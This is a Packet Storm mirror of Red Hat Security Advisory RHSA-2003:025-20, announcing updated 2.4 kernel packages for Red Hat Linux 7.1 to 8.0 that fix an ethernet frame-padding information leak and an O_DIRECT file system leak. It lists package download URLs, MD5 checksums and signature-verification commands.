class="Digg">Digg</a></li><li><a href="http://www.stumbleupon.com/submit?url=http://packetstormsecurity.com/files/30783/RHSA-2003-025-20.txt.html&title=RHSA-2003:025-20.txt" class="StumbleUpon">StumbleUpon</a></li></ul>
</div>
</div>
<div class="h1"><h1>RHSA-2003:025-20.txt</h1></div>
<div class="src">
<div><a href="/mirrors/">Change Mirror</a> <a href="/files/download/30783/RHSA-2003%3A025-20.txt">Download</a></div>
<pre><code><br />---------------------------------------------------------------------<br />                   Red Hat, Inc. Red Hat Security Advisory<br /><br />Synopsis:          Updated 2.4 kernel fixes various vulnerabilities<br />Advisory ID:       RHSA-2003:025-20<br />Issue date:        2003-01-24<br />Updated on:        2003-02-03<br />Product:           Red Hat Linux<br />Keywords:          ethernet frame padding O_DIRECT<br />Cross references:  <br />Obsoletes:         RHBA-2002:292<br />CVE Names:         CAN-2003-0001 CAN-2003-0018<br />---------------------------------------------------------------------<br /><br />1. Topic:<br /><br />Updated kernel packages for Red Hat Linux 7.1, 7.2, 7.3, and 8.0 are now<br />available that fix an information leak from several ethernet drivers, and<br />a file system issue.<br /><br />2. Relevant releases/architectures:<br /><br />Red Hat Linux 7.1 - athlon, i386, i586, i686<br />Red Hat Linux 7.2 - athlon, i386, i586, i686<br />Red Hat Linux 7.3 - athlon, i386, i586, i686<br />Red Hat Linux 8.0 - athlon, i386, i586, i686<br /><br />3. Problem description:<br /><br />The Linux kernel handles the basic functions of the operating system. <br />Vulnerabilities have been found in version 2.4.18 of the kernel.  This<br />advisory deals with updates to Red Hat Linux 7.1, 7.2, 7.3, and 8.0.  <br /><br />Multiple ethernet Network Interface Card (NIC) device drivers do not pad<br />frames with null bytes, which allows remote attackers to obtain information<br />from previous packets or kernel memory by using malformed packets.  The<br />Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned<br />the name CAN-2003-0001 to this issue.<br /><br />A vulnerability exists in O_DIRECT handling in Linux kernels 2.4.10 and<br />later that can create a limited information leak where any user on the<br />system with write privileges to a file system can read information from<br />that file system (from previously deleted files), and can create minor file<br />system corruption (easily repaired by fsck).  Red Hat Linux in its default<br />configuration is not affected by this bug, because the ext3 file system<br />(the default file system in Red Hat Linux 7.2 and later) does not support<br />the O_DIRECT feature.  Of the kernels Red Hat has released, only the 2.4.18<br />kernels have this bug.  The Common Vulnerabilities and Exposures project<br />(cve.mitre.org) has assigned the name CAN-2003-0018 to this issue.<br /><br />Users of the ext2 file system can migrate to the ext3 file system<br />using the tune2fs program as described in the white paper at<br />http://www.redhat.com/support/wpapers/redhat/ext3/<br /><br />All users of Red Hat Linux 7.1, 7.2, 7.3, and 8.0 should upgrade<br />to these errata packages, which contain patches to ethernet drivers to<br />remove the information leak and a patch to fix O_DIRECT handling.<br /><br />In addition, the following drivers are upgraded to support newer hardware:<br />3c59x, e100, e1000, tg3<br /><br />4. Solution:<br /><br />Before applying this update, make sure all previously released errata<br />relevant to your system have been applied, especially the additional<br />packages from RHSA-2002:205 and RHSA-2002:206 respectively.<br /><br />The procedure for upgrading the kernel manually is documented at:<br /><br />http://www.redhat.com/support/docs/howto/kernel-upgrade/<br /><br />Please read the directions for your architecture carefully before<br />proceeding with the kernel upgrade.<br /><br />Please note that this update is also available via Red Hat Network. Many<br />people find this to be an easier way to apply updates. To use Red Hat<br />Network, launch the Red Hat Update Agent with the following command:<br /><br />up2date<br /><br />This will start an interactive process that will result in the appropriate<br />RPMs being upgraded on your system. Note that you need to select the kernel<br />explicitly on default configurations of up2date.<br /><br />5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info):<br /><br />76159 - Errata kernel 2.4.18-17.8.0 fails PCI resource allocation<br /><br />6. RPMs required:<br /><br />Red Hat Linux 7.1:<br /><br />SRPMS:<br />ftp://updates.redhat.com/7.1/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm<br /><br />athlon:<br />ftp://updates.redhat.com/7.1/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm<br />ftp://updates.redhat.com/7.1/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm<br /><br />i386:<br />ftp://updates.redhat.com/7.1/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm<br />ftp://updates.redhat.com/7.1/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm<br />ftp://updates.redhat.com/7.1/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm<br />ftp://updates.redhat.com/7.1/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm<br /><br />i586:<br />ftp://updates.redhat.com/7.1/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm<br />ftp://updates.redhat.com/7.1/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm<br /><br />i686:<br />ftp://updates.redhat.com/7.1/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.1/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.1/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.1/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm<br /><br />Red Hat Linux 7.2:<br /><br />SRPMS:<br />ftp://updates.redhat.com/7.2/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm<br /><br />athlon:<br />ftp://updates.redhat.com/7.2/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm<br />ftp://updates.redhat.com/7.2/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm<br /><br />i386:<br />ftp://updates.redhat.com/7.2/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm<br />ftp://updates.redhat.com/7.2/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm<br />ftp://updates.redhat.com/7.2/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm<br />ftp://updates.redhat.com/7.2/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm<br /><br />i586:<br />ftp://updates.redhat.com/7.2/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm<br />ftp://updates.redhat.com/7.2/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm<br /><br />i686:<br />ftp://updates.redhat.com/7.2/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.2/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.2/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.2/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm<br /><br />Red Hat Linux 7.3:<br /><br />SRPMS:<br />ftp://updates.redhat.com/7.3/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm<br /><br />athlon:<br />ftp://updates.redhat.com/7.3/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm<br />ftp://updates.redhat.com/7.3/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm<br /><br />i386:<br />ftp://updates.redhat.com/7.3/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm<br />ftp://updates.redhat.com/7.3/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm<br />ftp://updates.redhat.com/7.3/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm<br />ftp://updates.redhat.com/7.3/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm<br /><br />i586:<br />ftp://updates.redhat.com/7.3/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm<br />ftp://updates.redhat.com/7.3/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm<br /><br />i686:<br />ftp://updates.redhat.com/7.3/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.3/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.3/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.3/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm<br /><br />Red Hat Linux 8.0:<br /><br />SRPMS:<br />ftp://updates.redhat.com/8.0/en/os/SRPMS/kernel-2.4.18-24.8.0.src.rpm<br /><br />athlon:<br />ftp://updates.redhat.com/8.0/en/os/athlon/kernel-2.4.18-24.8.0.athlon.rpm<br />ftp://updates.redhat.com/8.0/en/os/athlon/kernel-smp-2.4.18-24.8.0.athlon.rpm<br /><br />i386:<br />ftp://updates.redhat.com/8.0/en/os/i386/kernel-2.4.18-24.8.0.i386.rpm<br />ftp://updates.redhat.com/8.0/en/os/i386/kernel-source-2.4.18-24.8.0.i386.rpm<br />ftp://updates.redhat.com/8.0/en/os/i386/kernel-doc-2.4.18-24.8.0.i386.rpm<br />ftp://updates.redhat.com/8.0/en/os/i386/kernel-BOOT-2.4.18-24.8.0.i386.rpm<br /><br />i586:<br />ftp://updates.redhat.com/8.0/en/os/i586/kernel-2.4.18-24.8.0.i586.rpm<br />ftp://updates.redhat.com/8.0/en/os/i586/kernel-smp-2.4.18-24.8.0.i586.rpm<br /><br />i686:<br />ftp://updates.redhat.com/8.0/en/os/i686/kernel-2.4.18-24.8.0.i686.rpm<br />ftp://updates.redhat.com/8.0/en/os/i686/kernel-smp-2.4.18-24.8.0.i686.rpm<br />ftp://updates.redhat.com/8.0/en/os/i686/kernel-bigmem-2.4.18-24.8.0.i686.rpm<br />ftp://updates.redhat.com/8.0/en/os/i686/kernel-debug-2.4.18-24.8.0.i686.rpm<br /><br /><br /><br />7. Verification:<br /><br />MD5 sum                          Package Name<br />--------------------------------------------------------------------------<br />4d0a3a9f1bcdfec8a014c5666a4c4501 7.1/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm<br />7179efeb266bba7aa633a01267e24e74 7.1/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm<br />fcd9c11db5c7c02bd8ac16c12260c0e6 7.1/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm<br />63f1217de153ff63217515e1b016da33 7.1/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm<br />03a071c1c7252869382d683b1ceefa9f 7.1/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm<br />18dd6648f9d77d3d266e584c7c2feca4 7.1/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm<br />040aafbd075ad5f4041fa086a8179c80 7.1/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm<br />0a6684bc40e9f9f06d934dd806e182b3 7.1/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm<br />35e33d5b3746db33bdf747bf4a866e00 7.1/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm<br />e0f9b4ae807dd4ee026a026f8233e977 7.1/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm<br />ef2c961e676946329d5221fda16e2846 7.1/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm<br />13e60edc74a4e9ae6efe396acab4eb70 7.1/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm<br />c7b78cdeb9e72d94cfa80bbe49303241 7.1/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm<br />4d0a3a9f1bcdfec8a014c5666a4c4501 7.2/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm<br />7179efeb266bba7aa633a01267e24e74 7.2/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm<br />fcd9c11db5c7c02bd8ac16c12260c0e6 7.2/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm<br />63f1217de153ff63217515e1b016da33 7.2/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm<br />03a071c1c7252869382d683b1ceefa9f 7.2/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm<br />18dd6648f9d77d3d266e584c7c2feca4 7.2/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm<br />040aafbd075ad5f4041fa086a8179c80 7.2/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm<br />0a6684bc40e9f9f06d934dd806e182b3 7.2/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm<br />35e33d5b3746db33bdf747bf4a866e00 7.2/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm<br />e0f9b4ae807dd4ee026a026f8233e977 7.2/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm<br />ef2c961e676946329d5221fda16e2846 7.2/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm<br />13e60edc74a4e9ae6efe396acab4eb70 7.2/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm<br />c7b78cdeb9e72d94cfa80bbe49303241 7.2/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm<br />4d0a3a9f1bcdfec8a014c5666a4c4501 7.3/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm<br />7179efeb266bba7aa633a01267e24e74 7.3/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm<br />fcd9c11db5c7c02bd8ac16c12260c0e6 7.3/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm<br />63f1217de153ff63217515e1b016da33 7.3/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm<br />03a071c1c7252869382d683b1ceefa9f 7.3/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm<br />18dd6648f9d77d3d266e584c7c2feca4 7.3/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm<br />040aafbd075ad5f4041fa086a8179c80 7.3/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm<br />0a6684bc40e9f9f06d934dd806e182b3 7.3/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm<br />35e33d5b3746db33bdf747bf4a866e00 7.3/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm<br />e0f9b4ae807dd4ee026a026f8233e977 7.3/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm<br />ef2c961e676946329d5221fda16e2846 7.3/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm<br />13e60edc74a4e9ae6efe396acab4eb70 7.3/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm<br />c7b78cdeb9e72d94cfa80bbe49303241 7.3/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm<br />3ab26ebfd1c80ba101b5b86bf5cd6421 8.0/en/os/SRPMS/kernel-2.4.18-24.8.0.src.rpm<br />6e12213933aac18036ecbec4e9d0b0ac 8.0/en/os/athlon/kernel-2.4.18-24.8.0.athlon.rpm<br />619979740d16881959d5f888aefaf195 8.0/en/os/athlon/kernel-smp-2.4.18-24.8.0.athlon.rpm<br />2be552e4025aba02877ca21a0bd64007 8.0/en/os/i386/kernel-2.4.18-24.8.0.i386.rpm<br />232613b661b5dc806647935bbab16cb0 8.0/en/os/i386/kernel-BOOT-2.4.18-24.8.0.i386.rpm<br />b0dddbebe98c52bdeb737473319008a0 8.0/en/os/i386/kernel-doc-2.4.18-24.8.0.i386.rpm<br />43ffe5e9be347b2da60d83cc03d64923 8.0/en/os/i386/kernel-source-2.4.18-24.8.0.i386.rpm<br />d69f50521cb66ce09a9cefde417e8107 8.0/en/os/i586/kernel-2.4.18-24.8.0.i586.rpm<br />91e3b03e57e7df41d1472b45ad151719 8.0/en/os/i586/kernel-smp-2.4.18-24.8.0.i586.rpm<br />5ccc7bd0668a144b91580490ae487744 8.0/en/os/i686/kernel-2.4.18-24.8.0.i686.rpm<br />551569c64e64b83c145dc17b08dd505b 8.0/en/os/i686/kernel-bigmem-2.4.18-24.8.0.i686.rpm<br />56fafedd2ee58f288327fb56eaafd884 8.0/en/os/i686/kernel-debug-2.4.18-24.8.0.i686.rpm<br />b125aab060782242428bdafb05edab93 8.0/en/os/i686/kernel-smp-2.4.18-24.8.0.i686.rpm<br /><br /><br />These packages are GPG signed by Red Hat, Inc. for security.  Our key<br />is available at http://www.redhat.com/about/contact/pgpkey.html<br /><br />You can verify each package with the following command:<br />    <br />    rpm --checksig -v <filename><br /><br />If you only wish to verify that each package has not been corrupted or<br />tampered with, examine only the md5sum with the following command:<br />    <br />    md5sum <filename><br /><br /><br />8. References:<br /><br />http://www.atstake.com/research/advisories/2003/a010603-1.txt<br />http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0001<br />http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0018<br /><br />9. Contact:<br /><br />The Red Hat security contact is <security@redhat.com>.  More contact<br />details at http://www.redhat.com/solutions/security/news/contact.html<br /><br />Copyright 2003 Red Hat, Inc.<br /><br /><br /><br /></code></pre>
</div>
<div id="comments">
<h2>Comments</h2><a href="http://rss.packetstormsecurity.com/files/30783" class="rss-cmt"><img src="http://packetstatic.com/img1353978071/bt_rss.gif" width="16" height="16" alt="RSS Feed" /> <span>Subscribe to this comment feed</span></a><br /><p id="comment-none">No comments yet, be the first!</p></div>
<div id="comment-form" style="display:none"></div><div id="comment-login"><a href="https://packetstormsecurity.com/account/login/">Login</a> or <a href="https://packetstormsecurity.com/account/register/">Register</a> to post a comment</div>
    
    
     </div>
    
      <div id="adblock">
        
      </div>
      <div id="mn">
        <div class="mn-like-us">
<ul>
<li><a href="https://twitter.com/packet_storm"><img src="http://packetstatic.com/img1353978071/s_twitter.png" width="24" height="24" alt="Follow on Twitter" /> Follow us on Twitter</a></li>
<li><a href="https://www.facebook.com/packetstormfeed"><img src="http://packetstatic.com/img1353978071/s_facebook.png" width="24" height="24" alt="Follow on Facebook" /> Follow us on Facebook</a></li>
<li><a href="/feeds"><img src="http://packetstatic.com/img1353978071/s_rss.png" width="24" height="24" alt="View RSS Feeds" /> Subscribe to an RSS Feed</a></li>
</ul>
</div>
<div class="mn-like-us"><ul><li style="border-color: #afa; background: #efe"><a style="border-color: #6f6; background: #afa; color: #060; padding-left: 0;" href="/bugbounty/"><span style="color:#393">$ $ $</span>  Write Exploits? Get Paid!</a></li></ul></div>
<div>
<form id="cal" action="/files/cal/" method="post">
<h2>File Archive:</h2><h3>April 2013</h3>
<button id="cal-prev" name="cal-prev" type="button" value="2013-4"><span><</span></button><ul class="dotw"><li>Su</li><li>Mo</li><li>Tu</li><li>We</li><li>Th</li><li>Fr</li><li>Sa</li></ul>
<ul><li></li><li class="low"><a href="/files/date/2013-04-01/">1</a><div class="stats"><div class="point"></div><div class="date">Apr 1st</div><div class="count">10 Files</div></div></li><li class="med"><a href="/files/date/2013-04-02/">2</a><div class="stats"><div class="point"></div><div class="date">Apr 2nd</div><div class="count">15 Files</div></div></li><li class="med"><a href="/files/date/2013-04-03/">3</a><div class="stats"><div class="point"></div><div class="date">Apr 3rd</div><div class="count">16 Files</div></div></li><li class="med"><a href="/files/date/2013-04-04/">4</a><div class="stats"><div class="point"></div><div class="date">Apr 4th</div><div class="count">15 Files</div></div></li><li class="med"><a href="/files/date/2013-04-05/">5</a><div class="stats"><div class="point"></div><div class="date">Apr 5th</div><div class="count">30 Files</div></div></li><li class="low"><a href="/files/date/2013-04-06/">6</a><div class="stats"><div class="point"></div><div class="date">Apr 6th</div><div class="count">4 Files</div></div></li></ul>
<ul><li class="low"><a href="/files/date/2013-04-07/">7</a><div class="stats"><div class="point"></div><div class="date">Apr 7th</div><div class="count">12 Files</div></div></li><li class="med"><a href="/files/date/2013-04-08/">8</a><div class="stats"><div class="point"></div><div class="date">Apr 8th</div><div class="count">23 Files</div></div></li><li class="med"><a href="/files/date/2013-04-09/">9</a><div class="stats"><div class="point"></div><div class="date">Apr 9th</div><div class="count">26 Files</div></div></li><li class="med"><a href="/files/date/2013-04-10/">10</a><div class="stats"><div class="point"></div><div class="date">Apr 10th</div><div class="count">30 Files</div></div></li><li class="high"><a href="/files/date/2013-04-11/">11</a><div class="stats"><div class="point"></div><div class="date">Apr 11th</div><div class="count">63 Files</div></div></li><li class="low"><a href="/files/date/2013-04-12/">12</a><div class="stats"><div class="point"></div><div class="date">Apr 12th</div><div class="count">12 Files</div></div></li><li class="low"><a href="/files/date/2013-04-13/">13</a><div class="stats"><div class="point"></div><div class="date">Apr 13th</div><div class="count">3 Files</div></div></li></ul>
<ul><li class="low"><a href="/files/date/2013-04-14/">14</a><div class="stats"><div class="point"></div><div class="date">Apr 14th</div><div class="count">2 Files</div></div></li><li class="low"><a href="/files/date/2013-04-15/">15</a><div class="stats"><div class="point"></div><div class="date">Apr 15th</div><div class="count">11 Files</div></div></li><li class="med"><a href="/files/date/2013-04-16/">16</a><div class="stats"><div class="point"></div><div class="date">Apr 16th</div><div class="count">16 Files</div></div></li><li class="med"><a href="/files/date/2013-04-17/">17</a><div class="stats"><div class="point"></div><div class="date">Apr 17th</div><div class="count">15 Files</div></div></li><li class="med"><a href="/files/date/2013-04-18/">18</a><div class="stats"><div class="point"></div><div class="date">Apr 18th</div><div class="count">15 Files</div></div></li><li class="med"><a href="/files/date/2013-04-19/">19</a><div class="stats"><div class="point"></div><div class="date">Apr 19th</div><div class="count">19 Files</div></div></li><li class="low"><a href="/files/date/2013-04-20/">20</a><div class="stats"><div class="point"></div><div class="date">Apr 20th</div><div class="count">3 Files</div></div></li></ul>
<ul><li class="low"><a href="/files/date/2013-04-21/">21</a><div class="stats"><div class="point"></div><div class="date">Apr 21st</div><div class="count">3 Files</div></div></li><li class="low"><a href="/files/date/2013-04-22/">22</a><div class="stats"><div class="point"></div><div class="date">Apr 22nd</div><div class="count">12 Files</div></div></li><li class="low"><a href="/files/date/2013-04-23/">23</a><div class="stats"><div class="point"></div><div class="date">Apr 23rd</div><div class="count">13 Files</div></div></li><li class="low"><a href="/files/date/2013-04-24/">24</a><div class="stats"><div class="point"></div><div class="date">Apr 24th</div><div class="count">11 Files</div></div></li><li class="none today"><a href="/files/date/2013-04-25/">25</a><div class="stats"><div class="point"></div><div class="date">Apr 25th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2013-04-26/">26</a><div class="stats"><div class="point"></div><div class="date">Apr 26th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2013-04-27/">27</a><div class="stats"><div class="point"></div><div class="date">Apr 27th</div><div class="count">0 Files</div></div></li></ul>
<ul><li class="none"><a href="/files/date/2013-04-28/">28</a><div class="stats"><div class="point"></div><div class="date">Apr 28th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2013-04-29/">29</a><div class="stats"><div class="point"></div><div class="date">Apr 29th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2013-04-30/">30</a><div class="stats"><div class="point"></div><div class="date">Apr 30th</div><div class="count">0 Files</div></div></li><li></li><li></li><li></li><li></li></ul>
</form></div>
<div id="mn-top-author" class="top-ten">
<h2>Top Authors In Last 30 Days</h2>
<ul>
<li><a href="/files/authors/3786">Mandriva</a> <span>126 files</span></li>
<li><a href="/files/authors/4676">Red Hat</a> <span>44 files</span></li>
<li><a href="/files/authors/3695">Ubuntu</a> <span>28 files</span></li>
<li><a href="/files/authors/2985">Cisco Systems</a> <span>17 files</span></li>
<li><a href="/files/authors/2821">Debian</a> <span>11 files</span></li>
<li><a href="/files/authors/4612">HP</a> <span>11 files</span></li>
<li><a href="/files/authors/8993">juan vazquez</a> <span>9 files</span></li>
<li><a href="/files/authors/8123">Michael Messner</a> <span>7 files</span></li>
<li><a href="/files/authors/8035">High-Tech Bridge SA</a> <span>7 files</span></li>
<li><a href="/files/authors/8982">Slackware Security Team</a> <span>7 files</span></li>
</ul>
</div>
<div id="mn-tag-file"><h2>File Tags</h2><ul><li><a href="/files/tags/activex/">ActiveX</a> <span>(873)</span></li><li><a href="/files/tags/advisory/">Advisory</a> <span>(55,748)</span></li><li><a href="/files/tags/arbitrary/">Arbitrary</a> <span>(8,747)</span></li><li><a href="/files/tags/bbs/">BBS</a> <span>(2,859)</span></li><li><a href="/files/tags/bypass/">Bypass</a> <span>(575)</span></li><li><a href="/files/tags/cgi/">CGI</a> <span>(847)</span></li><li><a href="/files/tags/code_execution/">Code Execution</a> <span>(3,370)</span></li><li><a href="/files/tags/cracker/">Cracker</a> <span>(685)</span></li><li><a href="/files/tags/csrf/">CSRF</a> <span>(1,857)</span></li><li><a href="/files/tags/denial_of_service/">DoS</a> <span>(14,917)</span></li><li><a href="/files/tags/encryption/">Encryption</a> <span>(2,115)</span></li><li><a href="/files/tags/exploit/">Exploit</a> <span>(29,367)</span></li><li><a href="/files/tags/file_inclusion/">File Inclusion</a> <span>(3,386)</span></li><li><a href="/files/tags/firewall/">Firewall</a> <span>(748)</span></li><li><a href="/files/tags/info_disclosure/">Info Disclosure</a> <span>(1,212)</span></li><li><a href="/files/tags/intrusion_detection/">Intrusion Detection</a> <span>(663)</span></li><li><a href="/files/tags/java/">Java</a> <span>(1,320)</span></li><li><a href="/files/tags/javascript/">JavaScript</a> <span>(503)</span></li><li><a href="/files/tags/kernel/">Kernel</a> <span>(2,825)</span></li><li><a href="/files/tags/local/">Local</a> <span>(10,570)</span></li><li><a href="/files/tags/magazine/">Magazine</a> <span>(503)</span></li><li><a href="/files/tags/overflow/">Overflow</a> <span>(8,311)</span></li><li><a href="/files/tags/perl/">Perl</a> <span>(1,213)</span></li><li><a href="/files/tags/php/">PHP</a> <span>(3,984)</span></li><li><a href="/files/tags/proof_of_concept/">Proof of Concept</a> <span>(1,589)</span></li><li><a href="/files/tags/protocol/">Protocol</a> <span>(1,839)</span></li><li><a href="/files/tags/python/">Python</a> <span>(705)</span></li><li><a href="/files/tags/remote/">Remote</a> <span>(19,367)</span></li><li><a href="/files/tags/root/">Root</a> <span>(2,443)</span></li><li><a href="/files/tags/scanner/">Scanner</a> <span>(1,317)</span></li><li><a href="/files/tags/tool/">Security Tool</a> <span>(5,638)</span></li><li><a href="/files/tags/shell/">Shell</a> <span>(1,943)</span></li><li><a href="/files/tags/shellcode/">Shellcode</a> <span>(772)</span></li><li><a href="/files/tags/sniffer/">Sniffer</a> <span>(781)</span></li><li><a href="/files/tags/spoof/">Spoof</a> <span>(1,653)</span></li><li><a href="/files/tags/sql_injection/">SQL Injection</a> <span>(12,575)</span></li><li><a href="/files/tags/tcp/">TCP</a> <span>(1,961)</span></li><li><a href="/files/tags/trojan/">Trojan</a> <span>(541)</span></li><li><a href="/files/tags/udp/">UDP</a> <span>(713)</span></li><li><a href="/files/tags/virus/">Virus</a> <span>(573)</span></li><li><a href="/files/tags/vulnerability/">Vulnerability</a> <span>(22,058)</span></li><li><a href="/files/tags/web/">Web</a> <span>(5,497)</span></li><li><a href="/files/tags/paper/">Whitepaper</a> <span>(2,850)</span></li><li><a href="/files/tags/x86/">x86</a> <span>(585)</span></li><li><a href="/files/tags/xss/">XSS</a> <span>(12,267)</span></li><li><a href="/files/tags/">Other</a></li></ul></div><div id="mn-arch-file"><h2>File Archives</h2><ul><li><a href="/files/date/2013-04/">April 2013</a></li><li><a href="/files/date/2013-03/">March 2013</a></li><li><a href="/files/date/2013-02/">February 2013</a></li><li><a href="/files/date/2013-01/">January 2013</a></li><li><a href="/files/date/2012-12/">December 2012</a></li><li><a href="/files/date/2012-11/">November 2012</a></li><li><a href="/files/date/2012-10/">October 2012</a></li><li><a href="/files/date/2012-09/">September 2012</a></li><li><a href="/files/date/2012-08/">August 2012</a></li><li><a href="/files/date/2012-07/">July 2012</a></li><li><a href="/files/date/2012-06/">June 2012</a></li><li><a href="/files/date/2012-05/">May 2012</a></li><li><a href="/files/date/">Older</a></li></ul></div><div id="mn-os-file"><h2>Systems</h2><ul><li><a href="/files/os/aix/">AIX</a> <span>(371)</span></li><li><a href="/files/os/apple/">Apple</a> <span>(1,067)</span></li><li><a href="/files/os/bsd/">BSD</a> <span>(305)</span></li><li><a href="/files/os/cisco/">Cisco</a> <span>(1,393)</span></li><li><a href="/files/os/debian/">Debian</a> <span>(4,133)</span></li><li><a href="/files/os/fedora/">Fedora</a> <span>(1,663)</span></li><li><a href="/files/os/freebsd/">FreeBSD</a> <span>(1,053)</span></li><li><a href="/files/os/gentoo/">Gentoo</a> <span>(2,646)</span></li><li><a href="/files/os/hpux/">HPUX</a> <span>(735)</span></li><li><a href="/files/os/iphone/">iPhone</a> <span>(99)</span></li><li><a href="/files/os/irix/">IRIX</a> <span>(218)</span></li><li><a href="/files/os/juniper/">Juniper</a> <span>(63)</span></li><li><a href="/files/os/linux/">Linux</a> <span>(23,246)</span></li><li><a href="/files/os/osx/">Mac OS X</a> <span>(453)</span></li><li><a href="/files/os/mandriva/">Mandriva</a> <span>(2,472)</span></li><li><a href="/files/os/netbsd/">NetBSD</a> <span>(244)</span></li><li><a href="/files/os/openbsd/">OpenBSD</a> <span>(422)</span></li><li><a href="/files/os/redhat/">RedHat</a> <span>(3,170)</span></li><li><a href="/files/os/slackware/">Slackware</a> <span>(447)</span></li><li><a href="/files/os/solaris/">Solaris</a> <span>(1,524)</span></li><li><a href="/files/os/suse/">SUSE</a> <span>(1,440)</span></li><li><a href="/files/os/ubuntu/">Ubuntu</a> <span>(3,312)</span></li><li><a href="/files/os/unix/">UNIX</a> <span>(7,126)</span></li><li><a href="/files/os/unixware/">UnixWare</a> <span>(152)</span></li><li><a href="/files/os/windows/">Windows</a> <span>(4,233)</span></li><li><a href="/files/os/">Other</a></li></ul></div>
      </div>

  </div>

</div>

<div id="f">
  <div id="fc">

    <div class="f-box" style="margin: 50px 0 0 0;">
        <a href="/"><img src="http://packetstatic.com/img1353978071/ps_logo.png" width="218" alt="packet storm" /></a>
    <p class="copy">© 2013 Packet Storm. All rights reserved.</p>
    </div>

    <div class="f-box">
    <dl>
      <dt>Site Links</dt>
      <dd><a href="/news/date/">News by Month</a></dd>
      <dd><a href="/news/tags/">News Tags</a></dd>
      <dd><a href="/files/date/">Files by Month</a></dd>
